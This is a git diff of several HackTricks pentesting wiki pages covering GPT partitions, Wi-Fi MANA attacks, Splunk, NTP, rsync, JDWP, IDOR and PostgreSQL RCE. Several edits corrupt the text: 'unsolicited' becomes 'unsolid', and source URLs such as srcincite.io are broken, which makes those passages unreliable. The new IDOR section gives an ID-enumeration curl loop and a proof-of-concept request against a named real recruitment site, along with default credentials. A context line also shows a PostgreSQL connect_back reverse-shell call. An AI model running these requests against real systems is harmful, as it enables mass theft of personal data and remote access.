HackTricks-wiki
diff --git a/‎src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md‎
Lines changed: 1 addition & 2 deletions b/‎src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md‎
Lines changed: 1 addition & 2 deletions
diff --git a/‎src/generic-methodologies-and-resources/pentesting-wifi/README.md‎
Lines changed: 1 addition & 2 deletions b/‎src/generic-methodologies-and-resources/pentesting-wifi/README.md‎
Lines changed: 1 addition & 2 deletions
diff --git a/‎src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md‎
Lines changed: 3 additions & 4 deletions b/‎src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md‎
Lines changed: 3 additions & 4 deletions
diff --git a/‎src/mobile-pentesting/ios-pentesting/README.md‎
Lines changed: 2 additions & 3 deletions b/‎src/mobile-pentesting/ios-pentesting/README.md‎
Lines changed: 2 additions & 3 deletions
diff --git a/‎src/network-services-pentesting/873-pentesting-rsync.md‎
Lines changed: 1 addition & 2 deletions b/‎src/network-services-pentesting/873-pentesting-rsync.md‎
Lines changed: 1 addition & 2 deletions
diff --git a/‎src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md‎
Lines changed: 1 addition & 2 deletions b/‎src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md‎
Lines changed: 1 addition & 2 deletions
diff --git a/‎src/network-services-pentesting/pentesting-ntp.md‎
Lines changed: 19 additions & 19 deletions b/‎src/network-services-pentesting/pentesting-ntp.md‎
Lines changed: 19 additions & 19 deletions
diff --git a/‎src/pentesting-web/idor.md‎
Lines changed: 81 additions & 2 deletions b/‎src/pentesting-web/idor.md‎
Lines changed: 81 additions & 2 deletions
diff --git a/‎src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md‎
Lines changed: 2 additions & 2 deletions b/‎src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md‎
Lines changed: 2 additions & 2 deletions
@@ -97,7 +97,7 @@ The partition table header defines the usable blocks on the disk. It also define
 
 | Offset    | Length   | Contents                                                                                                                                                                     |
 | --------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| 0 (0x00)  | 8 bytes  | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)on little-endian machines) |
+| 0 (0x00)  | 8 bytes  | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#_note-8)on little-endian machines) |
 | 8 (0x08)  | 4 bytes  | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8                                                                                                                                  |
 | 12 (0x0C) | 4 bytes  | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes)                                                                                                 |
 | 16 (0x10) | 4 bytes  | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation                             |
@@ -236,4 +236,3 @@ You may notice that even performing that action there might be **other parts whe
 {{#include ../../../banners/hacktricks-training.md}}
 
 
-
@@ -718,7 +718,7 @@ This method allows an **attacker to create a malicious access point (AP) that re
 
 ### MANA
 
-Then, **devices started to ignore unsolicited network responses**, reducing the effectiveness of the original karma attack. However, a new method, known as the **MANA attack**, was introduced by Ian de Villiers and Dominic White. This method involves the rogue AP **capturing the Preferred Network Lists (PNL) from devices by responding to their broadcast probe requests** with network names (SSIDs) previously solicited by the devices. This sophisticated attack bypasses the protections against the original karma attack by exploiting the way devices remember and prioritize known networks.
+Then, **devices started to ignore unsolid network responses**, reducing the effectiveness of the original karma attack. However, a new method, known as the **MANA attack**, was introduced by Ian de Villiers and Dominic White. This method involves the rogue AP **capturing the Preferred Network Lists (PNL) from devices by responding to their broadcast probe requests** with network names (SSIDs) previously solid by the devices. This sophisticated attack bypasses the protections against the original karma attack by exploiting the way devices remember and prioritize known networks.
 
 The MANA attack operates by monitoring both directed and broadcast probe requests from devices. For directed requests, it records the device's MAC address and the requested network name, adding this information to a list. When a broadcast request is received, the AP responds with information matching any of the networks on the device's list, enticing the device to connect to the rogue AP.
 
@@ -791,4 +791,3 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github
 {{#include ../../banners/hacktricks-training.md}}
 
 
-
@@ -41,9 +41,9 @@ for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8
 
 **Usable public exploits:**
 
-- https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
-- https://www.exploit-db.com/exploits/46238
-- https://www.exploit-db.com/exploits/46487
+- [https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2](https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2)
+- [https://www.exploit-db.com/exploits/46238](https://www.exploit-db.com/exploits/46238)
+- [https://www.exploit-db.com/exploits/46487](https://www.exploit-db.com/exploits/46487)
 
 ## Abusing Splunk Queries
 
@@ -52,4 +52,3 @@ for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8
 {{#include ../../banners/hacktricks-training.md}}
 
 
-
@@ -34,8 +34,8 @@ basic-ios-testing-operations.md
 
 Some interesting iOS - IPA files decompilers:
 
-- https://github.com/LaurieWired/Malimite
-- https://ghidra-sre.org/
+- [https://github.com/LaurieWired/Malimite](https://github.com/LaurieWired/Malimite)
+- [https://ghidra-sre.org/](https://ghidra-sre.org/)
 
 It's recommended to use the tool [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) to perform an automatic Static Analysis to the IPA file.
 
@@ -1180,4 +1180,3 @@ otool -L <application_path>
 {{#include ../../banners/hacktricks-training.md}}
 
 
-
@@ -6,7 +6,7 @@
 
 From [wikipedia](https://en.wikipedia.org/wiki/Rsync):
 
-> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File_synchronization) [files](https://en.wikipedia.org/wiki/Computer_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](<https://en.wikipedia.org/wiki/Timestamping_(computing)>)and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite_note-man_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite_note-man_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
+> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File_synchronization) [files](https://en.wikipedia.org/wiki/Computer_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](<https://en.wikipedia.org/wiki/Timestamping_(computing)>)and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#_note-man_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#_note-man_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
 
 **Default port:** 873
 
@@ -101,4 +101,3 @@ Within this file, a _secrets file_ parameter might point to a file containing **
 {{#include ../banners/hacktricks-training.md}}
 
 
-
@@ -59,7 +59,7 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploi
 - [http://www.shodanhq.com/search?q=JDWP-HANDSHAKE](http://www.shodanhq.com/search?q=JDWP-HANDSHAKE)
 - http://www.hsc-news.com/archives/2013/000109.html (no longer active)
 - [http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt](http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt)
-- https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults
+- [https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults](https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults)
 - [http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html](http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html)
 - [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html](http://docs.oracle.com)
 - [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
@@ -69,4 +69,3 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploi
 {{#include ../banners/hacktricks-training.md}}
 
 
-
@@ -90,12 +90,12 @@ Pay special attention to ``restrict`` lines, ``kod`` (Kiss-o'-Death) settings, `
 
 | Year | CVE | Component | Impact |
 |------|-----|-----------|--------|
-| 2023 | **CVE-2023-26551→26555** | ntp 4.2.8p15 (libntp *mstolfp*, *praecis_parse*) | Multiple out-of-bounds writes reachable via **ntpq** responses. Patch in **4.2.8p16** 🡒 upgrade or back-port fixes. citeturn1search1turn1search2turn1search0|
-| 2023 | **CVE-2023-33192** | **ntpd-rs** (Rust implementation) | Malformed **NTS** cookie causes remote **DoS** prior to v0.3.3 – affects port 123 even when NTS **disabled**. citeturn4view0|
-| 2024 | distro updates | **chrony 4.4 / 4.5** – several security hardening & NTS-KE fixes (e.g. SUSE-RU-2024:2022) citeturn2search2|
-| 2024 | Record DDoS | Cloudflare reports a **5.6 Tbps UDP reflection** attack (NTP among protocols used). Keep *monitor* & *monlist* disabled on Internet-facing hosts. citeturn5search0|
+| 2023 | **CVE-2023-26551→26555** | ntp 4.2.8p15 (libntp *mstolfp*, *praecis_parse*) | Multiple out-of-bounds writes reachable via **ntpq** responses. Patch in **4.2.8p16** 🡒 upgrade or back-port fixes. |
+| 2023 | **CVE-2023-33192** | **ntpd-rs** (Rust implementation) | Malformed **NTS** cookie causes remote **DoS** prior to v0.3.3 – affects port 123 even when NTS **disabled**. |
+| 2024 | distro updates | **chrony 4.4 / 4.5** – several security hardening & NTS-KE fixes (e.g. SUSE-RU-2024:2022) |
+| 2024 | Record DDoS | Cloudflare reports a **5.6 Tbps UDP reflection** attack (NTP among protocols used). Keep *monitor* & *monlist* disabled on Internet-facing hosts. |
 
-> **Exploit kits**: Proof-of-concept payloads for the 2023 ntpq OOB-write series are on GitHub (see Meinberg write-up) and can be weaponised for client-side phishing of sysadmins. citeturn1search4
+> **Exploit kits**: Proof-of-concept payloads for the 2023 ntpq OOB-write series are on GitHub (see Meinberg write-up) and can be weaponised for client-side phishing of sysadmins. 
 
 ---
 ## Advanced Attacks
@@ -108,11 +108,11 @@ The legacy Mode-7 ``monlist`` query returns up to **600 host addresses** and is
 - Rate-limit UDP/123 on the edge or enable *sessions-required* on DDoS appliances.
 - Enable *BCP 38* egress filtering to block source spoofing.
 
-See Cloudflare’s learning-center article for a step-by-step breakdown. citeturn5search1
+See Cloudflare’s learning-center article for a step-by-step breakdown. 
 
 ### 2. Time-Shift / Delay attacks (Khronos / Chronos research)
 
-Even with authentication, an on-path attacker can silently **shift the client clock** by dropping/delaying packets. The IETF **Khronos (formerly Chronos) draft** proposes querying a diverse set of servers in the background and sanity-checking the result to detect a shift > 𝚡 ms. Modern chrony (4.4+) already implements a similar sanity filter (``maxdistance`` / ``maxjitter``). citeturn9search1
+Even with authentication, an on-path attacker can silently **shift the client clock** by dropping/delaying packets. The IETF **Khronos (formerly Chronos) draft** proposes querying a diverse set of servers in the background and sanity-checking the result to detect a shift > 𝚡 ms. Modern chrony (4.4+) already implements a similar sanity filter (``maxdistance`` / ``maxjitter``). 
 
 ### 3. NTS abuse & 4460/tcp exposure
 
@@ -126,7 +126,7 @@ nmap -sV -p 4460 --script ssl-enum-ciphers,ssl-cert <IP>
 openssl s_client -connect <IP>:4460 -alpn ntske/1 -tls1_3 -ign_eof
 ```
 
-Look for self-signed or expired certificates and weak cipher-suites (non-AEAD). Reference: RFC 8915 §4. citeturn11search0
+Look for self-signed or expired certificates and weak cipher-suites (non-AEAD). Reference: RFC 8915 §4. 
 
 ---
 ## Hardening / Best-Current-Practice (BCP-233 / RFC 8633)
@@ -139,7 +139,7 @@ Look for self-signed or expired certificates and weak cipher-suites (non-AEAD).
 4. Consider **leap-smear** to avoid leap-second outages, but ensure *all* downstream clients use the same smear window.
 5. Keep polling ≤24 h so leap-second flags are not missed.
 
-See RFC 8633 for a comprehensive checklist. citeturn8search0turn8search1
+See RFC 8633 for a comprehensive checklist. 
 
 ---
 ## Shodan / Censys Dorks
@@ -185,14 +185,14 @@ Entry_2:
 ---
 ## References
 
-- RFC 8915 – *Network Time Security for the Network Time Protocol* (port 4460) citeturn11search0
-- RFC 8633 – *Network Time Protocol BCP* citeturn8search0
-- Cloudflare DDoS report 2024 Q4 (5.6 Tbps) citeturn5search0
-- Cloudflare *NTP Amplification Attack* article citeturn5search1
-- NTP 4.2.8p15 CVE series 2023-04 citeturn1search4
-- NVD entries **CVE-2023-26551–55**, **CVE-2023-33192** citeturn1search1turn1search2turn1search0turn4view0
-- SUSE chrony security update 2024 (chrony 4.5) citeturn2search2
-- Khronos/Chronos draft (time-shift mitigation) citeturn9search1
-- chronyc manual/examples for remote monitoring citeturn3search0turn10search1
-- zgrab2 ntp module docs citeturn7search0
+- RFC 8915 – *Network Time Security for the Network Time Protocol* (port 4460) 
+- RFC 8633 – *Network Time Protocol BCP* 
+- Cloudflare DDoS report 2024 Q4 (5.6 Tbps) 
+- Cloudflare *NTP Amplification Attack* article 
+- NTP 4.2.8p15 CVE series 2023-04 
+- NVD entries **CVE-2023-26551–55**, **CVE-2023-33192** 
+- SUSE chrony security update 2024 (chrony 4.5) 
+- Khronos/Chronos draft (time-shift mitigation) 
+- chronyc manual/examples for remote monitoring 
+- zgrab2 ntp module docs 
 {{#include /banners/hacktricks-training.md}}
@@ -2,9 +2,88 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-**Check the post: [https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)**
+IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) appears when a web or API endpoint discloses or accepts a user–controllable identifier that is used **directly** to access an internal object **without verifying that the caller is authorized** to access/modify that object.  
+Successful exploitation normally allows horizontal or vertical privilege-escalation such as reading or modifying other users’ data and, in the worst case, full account takeover or mass-data exfiltration.
 
-{{#include ../banners/hacktricks-training.md}}
+---
+## 1. Identifying Potential IDORs
+
+1. Look for **parameters that reference an object**:
+   * Path: `/api/user/1234`, `/files/550e8400-e29b-41d4-a716-446655440000`  
+   * Query: `?id=42`, `?invoice=2024-00001`  
+   * Body / JSON: `{"user_id": 321, "order_id": 987}`  
+   * Headers / Cookies: `X-Client-ID: 4711`
+2. Prefer endpoints that **read or update** data (`GET`, `PUT`, `PATCH`, `DELETE`).
+3. Note when identifiers are **sequential or predictable** – if your ID is `64185742`, then `64185741` probably exists.
+4. Explore hidden or alternate flows (e.g. *"Paradox team members"* link in login pages) that might expose extra APIs.
+5. Use an **authenticated low-privilege session** and change only the ID **keeping the same token/cookie**. The absence of an authorization error is usually a sign of IDOR.
+
+### Quick manual tampering (Burp Repeater)
+```
+PUT /api/lead/cem-xhr HTTP/1.1
+Host: www.example.com
+Cookie: auth=eyJhbGciOiJIUzI1NiJ9...
+Content-Type: application/json
+
+{"lead_id":64185741}
+```
+
+### Automated enumeration (Burp Intruder / curl loop)
+```bash
+for id in $(seq 64185742 64185700); do
+  curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
+       -H 'Content-Type: application/json' \
+       -H "Cookie: auth=$TOKEN" \
+       -d '{"lead_id":'"$id"'}' | jq -e '.email' && echo "Hit $id";
+done
+```
+
+---
+## 2. Real-World Case Study – McHire Chatbot Platform (2025)
+
+During an assessment of the Paradox.ai-powered **McHire** recruitment portal the following IDOR was discovered:
 
+* Endpoint: `PUT /api/lead/cem-xhr`
+* Authorization: user session cookie for **any** restaurant test account
+* Body parameter: `{"lead_id": N}` – 8-digit, **sequential** numeric identifier
 
+By decreasing `lead_id` the tester retrieved arbitrary applicants’ **full PII** (name, e-mail, phone, address, shift preferences) plus a consumer **JWT** that allowed session hijacking. Enumeration of the range `1 – 64,185,742` exposed roughly **64 million** records.
+
+Proof-of-Concept request:
+```bash
+curl -X PUT 'https://www.mchire.com/api/lead/cem-xhr' \
+     -H 'Content-Type: application/json' \
+     -d '{"lead_id":64185741}'
+```
+
+Combined with **default admin credentials** (`123456:123456`) that granted access to the test account, the vulnerability resulted in a critical, company-wide data breach.
+
+---
+## 3. Impact of IDOR / BOLA
+* Horizontal escalation – read/update/delete **other users’** data.
+* Vertical escalation – low privileged user gains admin-only functionality.
+* Mass-data breach if identifiers are sequential (e.g., applicant IDs, invoices).
+* Account takeover by stealing tokens or resetting passwords of other users.
+
+---
+## 4. Mitigations & Best Practices
+1. **Enforce object-level authorization** on every request (`user_id == session.user`).  
+2. Prefer **indirect, unguessable identifiers** (UUIDv4, ULID) instead of auto-increment IDs.
+3. Perform authorization **server-side**, never rely on hidden form fields or UI controls.
+4. Implement **RBAC / ABAC** checks in a central middleware.
+5. Add **rate-limiting & logging** to detect enumeration of IDs.
+6. Security test every new endpoint (unit, integration, and DAST).
+
+---
+## 5. Tooling
+* **BurpSuite extensions**: Authorize, Auto Repeater, Turbo Intruder.  
+* **OWASP ZAP**: Auth Matrix, Forced Browse.  
+* **Github projects**: `bwapp-idor-scanner`, `Blindy` (bulk IDOR hunting).
+
+{{#include ../banners/hacktricks-training.md}}
 
+## References
+* [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII](https://ian.sh/mcdonalds)
+* [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
+* [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
+{{#include /banners/hacktricks-training.md}}
@@ -307,8 +307,8 @@ select connect_back('192.168.100.54', 1234);
 
 _Note that you don't need to append the `.dll` extension as the create function will add it._
 
-For more information **read the**[ **original publication here**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\
-In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_to learn how to compile a postgres extension read any of the previous versions_).\
+For more information **read the**[ **original publication here**](https://srcin.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\
+In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourcein/tools/blob/master/pgpwn.c) (_to learn how to compile a postgres extension read any of the previous versions_).\
 In the same page this **exploit to automate** this technique was given:
 
 ```python